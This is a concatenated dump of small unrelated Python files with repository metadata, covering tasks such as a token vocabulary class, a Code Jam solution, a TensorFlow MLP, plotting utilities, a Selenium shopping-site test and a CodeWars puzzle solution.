n_fft=int(16*64), hop_length=int(16*32), power=2.0)
feature = np.resize(feature, self.dim)
category_label = to_categorical(list_label[i], num_classes= len(self.list_labels) )
X.append(feature)
Y.append(category_label)
X = np.array(X, dtype=np.float32)
Y = np.array(Y, dtype=int)
return X, Y
# train_generator = BreathDataGenerator(
# 'D:/Do An/breath-deep/data/datawav_filter/train',
# list_labels=LIST_LABELS,
# batch_size=BATCH_SIZE,
# dim=INPUT_SIZE,
# shuffle=False)
# X, Y = train_generator.__getitem__(3)
# rate, data = wavfile.read("D:/Do An/breath-deep/data/datawav_filter/deep/01_male_23_BQuyen_1230_1270.wav")
# print(data) | true |
bee776a208bb4cfb0466fbbba5149af9bebd37a6 | Python | dorx/codesnippetsearch | /code_search/vocabulary.py | UTF-8 | 1,539 | 3.09375 | 3 | [
"MIT"
] | permissive | from typing import List, Dict, Counter as TypingCounter, Optional, Iterator
from collections import Counter
MASK_TOKEN = '%MASK%'
UNKNOWN_TOKEN = '%UNK%'
class Vocabulary:
def __init__(self):
self.token_to_id: Dict[str, int] = {MASK_TOKEN: 0, UNKNOWN_TOKEN: 1}
self.id_to_token: List[str] = [MASK_TOKEN, UNKNOWN_TOKEN]
def add_token(self, token: str):
if token in self.token_to_id:
return
token_id = len(self.id_to_token)
self.token_to_id[token] = token_id
self.id_to_token.append(token)
def get_token_id(self, token: str) -> Optional[int]:
return self.token_to_id.get(token, self.token_to_id[UNKNOWN_TOKEN])
def add_tokens(self, tokens: TypingCounter[str], vocabulary_size: int, count_threshold: int):
for token, count in tokens.most_common(vocabulary_size):
if count >= count_threshold:
self.add_token(token)
else:
break
@property
def size(self):
return len(self.id_to_token)
@staticmethod
def create_vocabulary(tokens: Iterator[str], ignored_tokens=None,
vocabulary_size: int = 10000, count_threshold: int = 10):
counter = Counter([token
for token in tokens
if not ignored_tokens or (ignored_tokens and token not in ignored_tokens)])
vocabulary = Vocabulary()
vocabulary.add_tokens(counter, vocabulary_size, count_threshold)
return vocabulary
| true |
8b55d761ffb598b3a0cd40930860efca84d7e917 | Python | dr-dos-ok/Code_Jam_Webscraper | /solutions_python/Problem_200/3538.py | UTF-8 | 1,434 | 2.859375 | 3 | [] | no_license | #f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/input2', 'r')
# C:\Users\Avinash\Desktop\Google codejam 2017\pycharmworks\AA-small-practice.in
# f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/A-large-practice.in', 'r')
f = open('C:/Users/Avinash/Desktop/Google codejam 2017/pycharmworks/B-small-attempt0.in', 'r')
data = f.readlines()
f.close()
f = open('tidy2', 'w')
t = data[0]
y = 0
for i in data[1:]:
y += 1
number = int(i)
stringnumber = str(number)
string1 = ""
for j in range(len(stringnumber) - 1):
ten = int(stringnumber[j])
if stringnumber[j] > stringnumber[j + 1]:
string1 = str(ten - 1)
for k in range(j, len(stringnumber) - 1):
string1 += "9"
stringnumber = stringnumber[:j] + string1
if stringnumber[j] == stringnumber[j + 1]:
try:
for k in range(j, len(stringnumber)):
if stringnumber[j] > stringnumber[k]:
string1 = str(ten - 1)
for x in range(j, len(stringnumber) - 1):
string1 += "9"
stringnumber = stringnumber[:j] + string1
except:
continue
count = (int(stringnumber))
print(count)
print("Case #" + str(y) + ": " + str(count), file=f)
f.close()
| true |
10fc9b2d7e508e3e467f4375f6b478f345decde7 | Python | gagejustins/snql | /snql/app/data_scripts/data_api.py | UTF-8 | 1,103 | 2.515625 | 3 | [] | no_license | import pandas as pd
def generate_pairs_owned_over_time_df(conn):
sql="""select
c.month,
count(*) as pairs_owned
from calendar_monthly c
join dim_sneakers s on s.created_at <= c.month
and (sold_at >= c.month or sold_at is null)
and (trashed_at >= c.month or trashed_at is null)
and (given_at >= c.month or given_at is null)
and c.month <= date_trunc('month', now())
group by 1
order by 1"""
cur = conn.cursor()
cur.execute(sql)
results = cur.fetchall()
pairs_owned_over_time = pd.DataFrame(results, columns=['date', 'num_owned'])
if pairs_owned_over_time is None:
return "generation failed"
else:
return pairs_owned_over_time
def generate_pairs_per_brand_df(conn):
sql = """select
manufacturer_name,
count(*)
from dim_sneakers
where is_owned = true
group by 1
order by 2 desc"""
cur = conn.cursor()
cur.execute(sql)
results = cur.fetchall()
pairs_per_brand = pd.DataFrame(results, columns=['brand','num_owned'])
if pairs_per_brand is None:
return "generation failed"
else:
return pairs_per_brand
| true |
1239fe53f1e1b6f81fa4bbf5e2cb2fcbd8cb2c4a | Python | nextwiggin4/TimeRisk | /dice_test.py | UTF-8 | 219 | 3.515625 | 4 | [] | no_license | from dice import *
d1 = Dice()
while True:
turn = input("please select a trun to check: ")
if turn == 'n':
print(d1.next_roll())
else:
print(d1.roll_for_turn(int(turn)))
print(d1.number_of_rols())
| true |
7eeddaa8459d741a5792749effdd1090ef781f3c | Python | linxigal/tfos | /tfos/tf/models/mlp.py | UTF-8 | 2,240 | 2.859375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
:Author : weijinlong
:Time :
:File :
"""
import tensorflow as tf
from tfos.tf import TFModel, TFCompile
class MLPModel(TFModel):
def __init__(self, input_dim=784, hidden_units=300, keep_prob=0.8):
"""
:param input_dim: 输入节点数
:param hidden_units: 隐含层节点数
:param keep_prob: Dropout失活率
"""
super(MLPModel, self).__init__()
self.input_dim = input_dim
self.hidden_units = hidden_units
self.add_params(keep_prob=keep_prob)
def build_model(self):
# in_units = 784 # 输入节点数
# h1_units = 300 # 隐含层节点数
# 初始化隐含层权重W1,服从默认均值为0,标准差为0.1的截断正态分布
w1 = tf.Variable(tf.truncated_normal([self.input_dim, self.hidden_units], stddev=0.1))
b1 = tf.Variable(tf.zeros([self.hidden_units])) # 隐含层偏置b1全部初始化为0
w2 = tf.Variable(tf.zeros([self.hidden_units, 10]))
b2 = tf.Variable(tf.zeros([10]))
x = tf.placeholder(tf.float32, [None, self.input_dim])
keep_prob = tf.placeholder(tf.float32) # Dropout失活率
# 定义模型结构
hidden1 = tf.nn.relu(tf.matmul(x, w1) + b1)
hidden1_drop = tf.nn.dropout(hidden1, rate=1 - keep_prob)
y = tf.nn.softmax(tf.matmul(hidden1_drop, w2) + b2)
self.add_inputs(x=x, keep_prob=keep_prob)
self.add_outputs(y=y)
return self
class MLPCompile(TFCompile):
def compile(self):
# 训练部分
# y = self.outputs_list()[0]
y = self.outputs['y']
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), 1))
train_op = tf.train.AdagradOptimizer(0.3).minimize(cross_entropy)
correct_prediction = tf.equal(tf.arg_max(y, 1), tf.arg_max(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
tf.summary.scalar('loss', cross_entropy)
self.add_inputs(y=y_)
self.add_metrics(train_op=train_op, loss=cross_entropy, accuracy=accuracy)
return self
| true |
074d56aa9fe8379f522d8d129cefc81cb4a2a805 | Python | michalporeba/cooking-with-python | /steps/step01/recipes.py | UTF-8 | 1,271 | 4.15625 | 4 | [
"MIT"
] | permissive | # the data - for now hardcoded three recipes
recipes = [
{ "name": "lemon cake", "description": "a cake with a lemon"},
{ "name": "brownies", "description": "a simple cake with chocolate"},
{ "name": "cookie"} # there is no description, so we can test this behaviour
]
def display_recipes():
print("Available recipes:")
for i, recipe in enumerate(recipes):
print(f"\t{i+1} - {recipe['name']}")
def get_users_choice(number_of_recipes) -> int:
while True:
print("\n(choose recipe number, or press enter to exit)")
choice = input("which recipe would you like to see?\n")
if not choice:
return None
elif choice.isdigit() and 0 < int(choice) <= number_of_recipes:
return int(choice)
print(f"The number must be between 1 and {number_of_recipes}!")
def display_recipe(recipe):
print(f"\n{recipe.get('name', 'UNKNOWN')}: {recipe.get('description', 'NO DESCRIPTION')}")
# the main application loop. keep going until it is time to end
while True:
display_recipes()
choice = get_users_choice(len(recipes))
if not choice: # there is no choice, so it is time to stop
break;
display_recipe(recipes[choice-1])
print("\n\nLet's try again!\n")
| true |
a7fbce000908fdfbc6bf8dc9a80780b5668698a7 | Python | pps789/introduction-to-deep-learning-2018 | /hw1/q3-3.py | UTF-8 | 775 | 3.125 | 3 | [] | no_license | import numpy as np
import matplotlib
import math
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def inv_F(y):
return -math.log(1-y)
def F(x):
return 1-math.exp(-x)
N = 1000000
# samples!
data = np.random.uniform(0,1,N)
samples = list(map(inv_F, data))
H_sample, X_sample = np.histogram(samples, bins = 500, normed = True)
dx_sample = X_sample[1] - X_sample[0]
C_sample = np.cumsum(H_sample) * dx_sample
plt.bar(X_sample[1:], C_sample, label='samples', width=np.diff(X_sample), linewidth=0)
# get exact values!
X_exacts = np.arange(0, X_sample[-1], 0.001)
Y_exacts = list(map(F, X_exacts))
plt.plot(X_exacts, Y_exacts, label='exacts', color='red')
plt.legend(loc='lower right')
plt.xlabel('value of X')
plt.ylabel('probability')
plt.savefig('q3-3.png')
| true |
33c165db6d4daeba6c1340cabb6f84dfaed52d06 | Python | remy-algo-dim/AD_serveur | /src/google_filters_to_good_format.py | UTF-8 | 590 | 2.78125 | 3 | [] | no_license | import pandas as pd
"""
Ce fichier a pour but de transformer le format des filtres que l'on telecharge depuis le drive (format CSV),
en bon format pour notre algo. On renseignera donc en input :
- CSV = path du csv telecharge depuis DRIVE
- NON_CLIENT = il s'agit du nom du client figurant dans la premiere colonne du CSV
- id_ = C'est l'id du client dans MYSQL
"""
CSV = ""
NOM_CLIENT = ""
id_ = ""
df = pd.read_csv(CSV)
df = df[df['Nom - Prénom - Nom société'] == NOM_CLIENT]
df.to_excel("/Users/remyadda/Desktop/AD/Projets/AD_serveur/src/premium/Config/filtres_"+str(id_)+".xlsx") | true |
215ace42f4865281b3df20b96fe77ba398df9aaa | Python | Wolvarun9295/PythonLibraries | /Seaborn/Swarm Plot/1.PlotOfBillvsSize.py | UTF-8 | 149 | 2.625 | 3 | [] | no_license | import seaborn as sns
import matplotlib.pyplot as plt
tips = sns.load_dataset("tips")
sns.swarmplot(x='total_bill', y='size', data=tips)
plt.show()
| true |
bbe0302aa3aa7622696d2a36d0bd619a94c26357 | Python | LucasOJacintho/DESENVOLVIMENTO-PYTHON | /DESENVOLVIMENTO PYTHON/1014 - Consumo.py | UTF-8 | 101 | 3.0625 | 3 | [] | no_license | distancia=int(input(''))
combustivel=float(input(''))
print ("%.3f" % (distancia/combustivel),'km/l') | true |
f09f7c467bdbfb83b79b41af2003d76057d9d0a3 | Python | HAOYU-LI/Web_Search_Application | /src/Inverted_ID.py | UTF-8 | 3,213 | 2.921875 | 3 | [] | no_license | import os
import re
import sys
import json
class Inverted_ID:
"""
A class that constructs the inverted index for cvpr metadata.
input:
dic : A dictionary that stores the cvpr research papers. e.g.
{'cvpr':
[{'subject': '2013 IEEE Conference on Computer Vision and Pattern Recognition',
'links': 'http://openaccess.thecvf.com/content_cvpr_2014/papers/Cheng_Fast_and_Accurate_2014_CVPR_paper.pdf',
'pages': 8,
'title': 'Fast and Accurate Image Matching with Cascade Hashing for 3D Reconstruction',
'year': 2014,
'author': 'Jian Cheng, Cong Leng, Jiaxiang Wu, Hainan Cui, Hanqing Lu'},
{'subject': '2013 IEEE Conference on Computer Vision and Pattern Recognition',
'links': 'http://openaccess.thecvf.com/content_cvpr_2014/papers/Hartmann_Predicting_Matchability_2014_CVPR_paper.pdf',
'pages': 8,
'title': 'Predicting Matchability',
'year': 2014,
'author': 'Wilfried Hartmann, Michal Havlena, Konrad Schindler'}...
]
}
"""
def __init__(self, dic):
self.word_lst = dic['cvpr']
self.inverted_idx = {}
self._construct_idx()
def _construct_idx(self):
for i in range(len(self.word_lst)):
cur_dict = self.word_lst[i]
if 'subject' in cur_dict:
self._add(cur_dict['subject'], i)
#if 'pages' in cur_dict:
# self._add(cur_dict['pages'], i)
#if 'year' in cur_dict:
# self._add(cur_dict['year'], i)
if 'author' in cur_dict:
self._add(cur_dict['author'], i)
def _add(self, words, index):
for word in str(words).split():
word = re.sub(r'[/,#$.?!"<>();&-]', '', word)
word = word.lower()
if word.isdigit() or len(word) <= 1:
continue
if word not in self.inverted_idx:
self.inverted_idx[word] = set()
self.inverted_idx[word].add(index)
def search(self, words, vis = True):
"""
return a index list where each record of that index contains the words.
input:
words : A word list to search.
vis : If True: print the records out.
return:
List of index.
"""
result_lst = set()
words = words.split()
for word in words:
word = re.sub(r'[/,#$.?!"<>();&-]', '', word)
word = word.lower()
if word in self.inverted_idx:
for idx in self.inverted_idx[word]:
result_lst.add(idx)
#print(result_lst)
if vis:
for ele in result_lst:
print(self.word_lst[ele])
return list(result_lst)
def get_inverted_idx(self):
return self.inverted_idx
| true |
b89e0be3bb1597a95716fe5f194fef0a94df6255 | Python | ewhuang/pacer | /ensg_to_hgnc_conversion.py | UTF-8 | 3,552 | 2.734375 | 3 | [] | no_license | ### Author: Edward Huang
from collections import OrderedDict
import numpy as np
### This script converts the new auc file for drug response in patients to the
### old format that the Mayo data used. Also converts the gene expression table
### to the old format. Lastly, converts the LINCS level 4 data to the old
### format.
if __name__ == '__main__':
# Read in the cell line translation information.
f = open('./data/cell_line.txt', 'r')
# Keys are ccl_id's, values are the ccl_names.
ccl_id_to_name = {}
for i, line in enumerate(f):
if i == 0:
continue
line = line.split()
# Skip a line if it doesn't have a translation.
if len(line) == 1:
continue
ccl_name, ccl_id = line
ccl_id_to_name[ccl_id] = ccl_name
f.close()
# Read in the drug translation information.
f = open('./data/drug.txt', 'r')
# Keys are master_cpd_id, values are broad_cpd_id.
master_cpd_to_broad = {}
for i, line in enumerate(f):
if i == 0:
continue
master_cpd_id, broad_cpd_id = line.split()
master_cpd_to_broad[master_cpd_id] = broad_cpd_id
f.close()
# Read in the raw drug response data, and construct the corresponding
# dictionary.
ccl_lst = []
drug_resp_dct = OrderedDict({})
f = open('./data/auc.txt', 'r')
for i, line in enumerate(f):
if i == 0:
continue
experiment_id, auc, master_cpd_id, ccl_id = line.split()
# Translate the drug id's and the ccl id's.
drug_id = master_cpd_to_broad[master_cpd_id]
# Insert values into drug response dictionary.
if drug_id not in drug_resp_dct:
drug_resp_dct[drug_id] = OrderedDict({})
# Skip cancer cell lines not in our dictionary.
if ccl_id not in ccl_id_to_name:
continue
ccl_name = ccl_id_to_name[ccl_id]
if ccl_name not in ccl_lst:
ccl_lst += [ccl_name]
auc = float(auc)
if ccl_name in drug_resp_dct[drug_id]:
drug_resp_dct[drug_id][ccl_name] += [auc]
else:
drug_resp_dct[drug_id][ccl_name] = [auc]
f.close()
# Write out to our old format for drug response.
out = open('./data/auc_hgnc.tsv', 'w')
out.write('exposure\t' + '\t'.join(ccl_lst) + '\n')
for drug in drug_resp_dct:
out.write(drug)
for ccl in ccl_lst:
if ccl not in drug_resp_dct[drug]:
out.write('\tNA')
else:
out.write('\t%f' % np.mean(drug_resp_dct[drug][ccl]))
out.write('\n')
out.close()
f = open('./data/gene_expression.txt', 'r')
out = open('./data/gene_expression_hgnc.tsv', 'w')
# Gene expression cancer cell lines.
for i, line in enumerate(f):
if i == 0:
out.write('gid\t')
ge_ccl = line.split()[2:]
assert len(set(ccl_lst).difference(ge_ccl)) == 0
ge_indices = [ge_ccl.index(cl) for cl in ccl_lst]
ge_ccl = [ge_ccl[i] for i in ge_indices]
out.write('\t'.join(ge_ccl) + '\n')
continue
line = line.split()[1:]
gene_id, cell_lines = line[0], line[1:]
try:
float(gene_id)
except ValueError:
# Remove cell lines that don't appear in the drug response.
cell_lines = [cell_lines[i] for i in ge_indices]
out.write(gene_id + '\t' + '\t'.join(cell_lines) + '\n')
f.close()
out.close() | true |
b432a9723adf994533ed1bba53f318b62834a3d2 | Python | bobovnii/Stau | /NTupleMaker/test/DatacardProducer/ratioPlotSyst.py | UTF-8 | 5,023 | 2.640625 | 3 | [] | no_license | ######################################################################################
# Script to plot the central, up and down distributions #
# for each MC process and syst uncertainty. #
# The lower pad plots the ratios. #
# It is meant to run on ROOT files produced by the datacardProducer.py script #
# #
# Please adjust #
# - Input directory (indir) #
# - Output directory where to save plots (plotOutDir) #
# - Dict with input ROOT files and variable name (varDict) #
# - The name of the categories and systematics (cat, systName) #
# #
# Input argument: channel (et or mt) #
# To run, e.g.: #
# python ratioPlotSyst.py mt #
# #
######################################################################################
import os, sys, ROOT
from ROOT import *
def setOutputName(dirName, catName, mcName, systName, varName):
return dirName+"/"+catName+"_"+mcName+"_"+systName+"_"+varName
def makeRatioPlot(hcentr, hup, hdown, dirName, catName, mcName, systName, varName):
c = TCanvas("c"+varName+"_"+catName+"_"+mcName+"_"+systName, "c"+varName+"_"+catName+"_"+mcName+"_"+systName, 600,700)
topPad = TPad("top","top",0, 0.3, 1,1)
topPad.SetBottomMargin(0)
topPad.Draw()
topPad.cd()
hcentr.SetTitle(varName + " in " +catName+": "+mcName+" "+systName)
hcentr.Draw()
hup.Draw("same")
hdown.Draw("same")
hcentr.SetLineColor(kBlack)
hcentr.SetMarkerStyle(20)
hcentr.SetMarkerSize(0.7)
hcentr.SetMarkerColor(kBlack)
hup.SetLineColor(kBlue)
hup.SetMarkerStyle(22)
hup.SetMarkerSize(0.7)
hup.SetMarkerColor(kBlue)
hdown.SetLineColor(kRed)
hdown.SetMarkerStyle(23)
hdown.SetMarkerSize(0.7)
hdown.SetMarkerColor(kRed)
hup.SetStats(0)
hdown.SetStats(0)
hcentr.SetStats(0)
leg = TLegend(0.6, 0.7, 0.9, 0.9)
leg.AddEntry(hcentr, "central", "lp")
leg.AddEntry(hup, "syst Up","lp")
leg.AddEntry(hdown, "syst Down","lp")
leg.Draw()
c.cd()
downPad = TPad("down","down",0,0,1,0.3)
downPad.SetTopMargin(0)
downPad.Draw()
downPad.cd()
#making clones before dividing
hdown_c = hdown.Clone("")
hup_c = hup.Clone("")
hcentr_c = hcentr.Clone("")
hup_c.SetStats(0)
hdown_c.SetStats(0)
hcentr_c.SetStats(0)
hup_c.Divide(hcentr_c)
hup_c.SetAxisRange(0.,2.,"Y")
hup_c.Draw("e")
hdown_c.Divide(hcentr)
hdown_c.Draw("eSAME")
hcentr_c.Divide(hcentr)
hcentr_c.Draw("eSAME")
hup_c.SetTitle("")
c.Update()
oname = setOutputName(dirName, catName, mcName, systName, varName)
c.SaveAs(oname+".png")
#delete objects (maybe not needed)
hdown_c.Delete()
hup_c.Delete()
hcentr_c.Delete()
#######################
# beginning of "main" #
#######################
ROOT.TH1.SetDefaultSumw2(kTRUE)
channel = sys.argv[1]
# directory with input ROOT file
indir = "/nfs/dust/cms/user/bottav/CMSSW_8_0_25/src/DesyTauAnalyses/NTupleMaker/test/DatacardProducer/"
#specify here (varDict) the name of the input ROOT file (datacard file with systematic variations) and name of the variable (eg: "mvis", "msv", ..)
varDict = {"bin": "cuts_mt_nominal_mt_nominal_htt_mt.inputs-sm-13TeV-mvis.root"}
#mcProc = ["ZTT","ZL","ZJ","TTJ","TTT","W","VV","QCD"]
mcProc = ["ZL"]
#directory for plots
plotOutDir = "."
#systematics to include and cathegories for each channel
#Must match the names in the input ROOT file
if channel == "et":
cat = ["et_inclusive", "et_inclusivemt40"]
systName = ["_CMS_scale_t_13TeV","_topPtWeight","_CMS_scale_eEB_13TeV", "_CMS_scale_eEE_13TeV"]
if channel == "mt":
#cat = ["mt_boosted", "mt_0jet", "mt_vbf"]
cat = ["mt_0jet"]
#systName = ["_CMS_scale_t_1prong_13TeV","_CMS_scale_t_3prong_13TeV", "_CMS_scale_t_1prong1pizero_13TeV"]
systName = ["_CMS_mFakeTau_1prong_13TeV", "_CMS_mFakeTau_1prong1pizero_13TeV", "_CMS_ZLShape_mt_0jet_1prong_13TeV", "_CMS_ZLShape_mt_0jet_1prong1pizero_13TeV"]
else:
print "invalid channel choice"
for varName, varFile in varDict.iteritems():
inFile = TFile(indir+varFile,"read")
#loop on file folders
for aCat in cat:
print "Category ", aCat
#define totMC histos
h_totMC_centr = TH1F()
h_totMC_up = TH1F()
h_totMC_down = TH1F()
#loop on MC processes
for MCname in mcProc:
#take histos
print "Getting ", aCat+"/"+MCname
hCentral = inFile.Get(aCat+"/"+MCname)
h_totMC_centr.Add(hCentral)
for aSyst in systName:
print "Getting ", aCat+"/"+MCname+aSyst+"Down"
hDown = inFile.Get(aCat+"/"+MCname+aSyst+"Down")
h_totMC_down.Add(hDown)
print "Getting ", aCat+"/"+MCname+aSyst+"Up"
hUp = inFile.Get(aCat+"/"+MCname+aSyst+"Up")
h_totMC_up.Add(hUp)
#make ratios for each MC process, each systematic
makeRatioPlot(hCentral, hUp, hDown, plotOutDir, aCat, MCname, aSyst, varName)
#make ratio plot of total MC, all syst up and all down
makeRatioPlot(h_totMC_centr, h_totMC_up, h_totMC_down, plotOutDir, aCat, "allMC", "allSyst",varName)
inFile.Close()
| true |
30bbf1c6f184ee2a9a99d92529d37ff0c24a6686 | Python | primus2019/mini-project | /utils/Plots.py | UTF-8 | 2,097 | 2.59375 | 3 | [] | no_license | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from .EDA import feature_VIF
def correlationPlot(ds, features, savefig, title=None):
features = ds.columns.values.tolist() if features == 'all' else features
corr = ds.loc[:, features].corr()
mask = np.zeros_like(corr, dtype=np.bool)
mask[np.triu_indices_from(mask)] = True
f, ax = plt.subplots(figsize=(24, 20))
cmap = sns.diverging_palette(220, 10, as_cmap=True)
sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,
square=True, linewidths=.5, cbar_kws={"shrink": .5})
if title:
plt.title(title)
plt.savefig(savefig)
def vifPlot(ds, features, savefig, title=None):
features = ds.columns.values.tolist() if features == 'all' else features
vif = pd.DataFrame(np.zeros((ds.shape[1], ds.shape[1])), index=ds.columns.values, columns=ds.columns.values)
for f1 in features:
for f2 in features:
if f1 != f2:
# print(f1, ' ', f2)
temp_vif = feature_VIF(ds, features=[f1, f2]).values.tolist()[0][0]
vif.loc[f1, f2] = temp_vif
# print(vif)
mask = np.zeros_like(vif, dtype=np.bool)
mask[np.triu_indices_from(mask)] = True
f, ax = plt.subplots(figsize=(24, 20))
cmap = sns.diverging_palette(220, 10, as_cmap=True)
sns.heatmap(vif, mask=mask, cmap=cmap, robust=True, center=0,
square=True, linewidths=.5, cbar_kws={"shrink": .5})
if title:
plt.title(title)
plt.savefig(savefig)
def jointPlot(ds, f1, f2, savefig, title='default', logarithmic=False):
sns.set(style="ticks")
if logarithmic:
p = sns.jointplot(ds[[f1]], ds[[f2]], kind="reg", color="#4CB391", logx=logarithmic)
# p.ax_joint.set_xscale('log')
# p.ax_joint.set_yscale('log')
else:
p = sns.jointplot(ds[[f1]], ds[[f2]], kind="hex", color="#4CB391")
# if title == 'default':
# title = 'Marginal distributions between {} and {}'.format(f1, f2)
# plt.title(title)
plt.savefig(savefig)
| true |
752bd5e6cc99f72c6814537c118c9ff58134757a | Python | lucaschen321/leetcode | /python/p0424-longest-repeating-character-replacement/p0424-longest-repeating-character-replacement.py | UTF-8 | 1,078 | 3.640625 | 4 | [
"MIT"
] | permissive | from collections import defaultdict
class Solution:
def characterReplacement(self, s: str, k: int) -> int:
if not s:
return 0
character_frequency = defaultdict(int)
character_frequency[s[0]] += 1 # Include 1st character so character_frequency.values() isn't empty
left, right, max_substring = 0, 1, 0
while right < len(s):
most_common_character_frequency = max(character_frequency.values())
if (right - left) - most_common_character_frequency < k or \
character_frequency[s[right]] == max(character_frequency.values()):
# If (right - left) - most_common_character_frequency = k, only
# increment right if it is a most common character (there may be
# more than one)
character_frequency[s[right]] += 1
right += 1
else:
character_frequency[s[left]] -= 1
left += 1
max_substring = max(max_substring, right - left)
return max_substring
| true |
38d76130202cfd90e8de51c59a628bc9acb4b92c | Python | Dhanush33324/Python_Pytest_Demo | /Scenario 1.py | UTF-8 | 2,000 | 2.5625 | 3 | [] | no_license | from selenium import webdriver
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.wait import WebDriverWait
driver = webdriver.Chrome("./chromedriver")
driver.get("https://rahulshettyacademy.com/seleniumPractise/#/")
search_item = "Apple"
driver.find_element_by_xpath("//input[@placeholder='Search for Vegetables and Fruits']").send_keys(search_item)
driver.find_element_by_xpath("//button[@class='search-button']").click()
driver.find_element_by_xpath(f"//h4[text()='{search_item} - 1 Kg']/..//a[@class='increment']").click()
driver.find_element_by_xpath(f"//h4[text()='{search_item} - 1 Kg']/..//button[text()='ADD TO CART']").click()
driver.find_element_by_xpath("//img[@alt='Cart']").click()
driver.find_element_by_xpath("//button[text()='PROCEED TO CHECKOUT']").click()
driver.find_element_by_xpath("//img[@alt='Cart']").click()
driver.find_element_by_xpath("//button[text()='PROCEED TO CHECKOUT']").click()driver.find_element_by_xpath("//img[@alt='Cart']").click()
driver.find_element_by_xpath("//button[text()='PROCEED TO CHECKOUT']").click()
wait = WebDriverWait(driver, 10)
wait.until(expected_conditions.visibility_of_element_located(("xpath","//button[text()='Place Order']")))
amounts = driver.find_elements_by_xpath("//p[@class='amount']")
# print(len(amounts))
a = []
for index, amount in enumerate(amounts):
print(index)
if index%2 != 0:
print(int(amount.text))
a.append(int(amount.text))
total = sum(a)
if int(driver.find_element_by_xpath("//span[@class='discountAmt']").text) == total:
driver.find_element_by_xpath("//button[text()='Place Order']").click()
select = Select(driver.find_element_by_xpath("//option[text()='Select']"))
select.select_by_visible_text("India")
driver.find_element_by_xpath("//input[@type='checkbox']").click()
driver.find_element_by_xpath("//button[text()='Proceed']").click()
Successful_message = driver.find_element_by_xpath()
| true |
a41fca7d8eee1fb49cafbeca0b1b1265dd30914a | Python | Artem-Efremov/CodeWars | /Strings/6kyu_Scooby Doo Puzzle.py | UTF-8 | 4,256 | 3.765625 | 4 | [] | no_license | """
Introduction
Good one Shaggy! We all love to watch Scooby Doo, Shaggy Rogers, Fred Jones, Daphne Blake and Velma Dinkley solve the clues and figure out who was the villain. The story plot rarely differed from one episode to the next. Scooby and his team followed the clue then unmasked the villain at the end.
Scooby Doo
Task
Your task is to initially solve the clues and then use those clues to unmask the villain. You will be given a string of letters that you must manipulate in a way that the clues guide you. You must then output the villain.
You will be given an Array of potential villains and you must only return the correct masked villain.
Potential Villains for the example test cases
Black Knights, Puppet Master, Ghost Clowner, Witch Doctors, Waxed Phantom, Manor Phantom, Ghost Bigfoot, Haunted Horse, Davy Crockett, Captain Injun, Greens Gloobs, Ghostly Manor, Netty Crabbes, King Katazuma, Gators Ghouls, Headless Jack, Mambas Wambas, Medicines Man, Demon Sharker, Kelpy Monster, Gramps Vamper, Phantom Racer, Skeletons Men, Moon Monsters
There will be different villains for the main test cases!
Clue 1: The first clue is in a 'house' on 'String Class' Avenue.
Good luck!
"""
# Clue 1: The first clue is in a 'house' on 'String Class' Avenue.
# def scoobydoo(villian, villians):
# x = String()
# x.house()
# """
# Step 1: Rotate all letters to the right by 5
# Clue: You are close to the monster so you may need to create a 'Disguise'
# """
# # Step 2:
# def scoobydoo(villian, villians):
# x = Disguise()
# """
# Step 2: Reverse the whole string
# Clue: What is the length of Scooby Doo's favourite snack?
# Try using the answer in the Integer Class
# """
# # Step 3:
# def scoobydoo(villian, villians):
# x = Integer()
# """dog biscuit"""
# x.eleven()
"""
Step 3: Add 5 letters onto every even letter in the Villans Name ie a=>f
Make sure after the letter z it goes round to a
"""
def char_shift_a_z(char, shift=5):
return chr((ord(char) - 96 + shift) % 26 + 96)
def scoobydoo(villian, villians):
merged_vil = [i.replace(' ', '').lower() for i in villians]
conv_table = dict(zip(merged_vil, villians))
step_1 = villian[-5:] + villian[:-5] # 1. Rotate all letters to the right by 5
step_2 = step_1[::-1] # 2. Reverse the whole string
step_3 = '' # 3. Add 5 letters onto every even letter in the Villans Name ie a=>f
pos = 1 # Make sure after the letter z it goes round to a
for i in step_2:
if pos % 2 == 0 and i.isalpha():
step_3 += chr((ord(i) - 97 + 5) % 26 + 97)
else:
step_3 += i
pos += 1
return conv_table[step_3]
def scoobydoo(villian, villians):
return [v for v in villians if villian[-6:0:-2] in v[::2]][0]
import random
def scoobydooreverse(villian):
villian = ''.join(villian.split(' ')).lower()
badguy = ""
num = 0
for le in villian:
num += 1
if num % 2 == 0:
le = le.translate(str.maketrans('fghijklmnopqrstuvwxyzabcde','abcdefghijklmnopqrstuvwxyz'))
badguy += le
villian = badguy
villian = villian[::-1]
villian = ''.join(shift(villian, -5))
return villian
def scoobydoo2(villian, villians):
villian = villian.lower()
villian = ''.join(shift(villian, 5))
villian = villian[::-1]
badguy = ""
num = 0
for le in villian:
num += 1
if num % 2 == 0:
le = le.translate(str.maketrans('abcdefghijklmnopqrstuvwxyz','fghijklmnopqrstuvwxyzabcde'))
badguy += le
for bg in villians:
if ''.join(bg.lower().split(' ')) == badguy: return bg
letters = "abcdefghijklmnopqrstuvwxwz"
for rtest in range(100):
villians = []
for le in range(20):
vil = ""
for le in range(20):
vil += letters[random.randint(0,len(letters)-1)]
villians.append(vil)
n = random.randint(0,len(villians)-1)
bb = scoobydooreverse(villians[n])
solution = scoobydoo2(bb,villians)
result = scoobydoo(bb,villians)
test.it("Should return: "+solution)
test.assert_equals(result, solution)
| true |
5aff677bbf36e68ff625f16c37ccef5c7c643cf3 | Python | DanielJBurbridge/Jetbrains-Academy | /Hyperskill/Python/Medium/Webscraper/Webscraper/1.0/scraper.py | UTF-8 | 293 | 3.09375 | 3 | [] | no_license | import requests
url = input("Input the URL:\n")
r = requests.get(url)
if r.status_code == 200:
r_json = (r.json())
if 'content' in r_json:
print(r_json.get('content'))
else:
print("Invalid quote resource!")
else:
print("Invalid quote resource!")
| true |
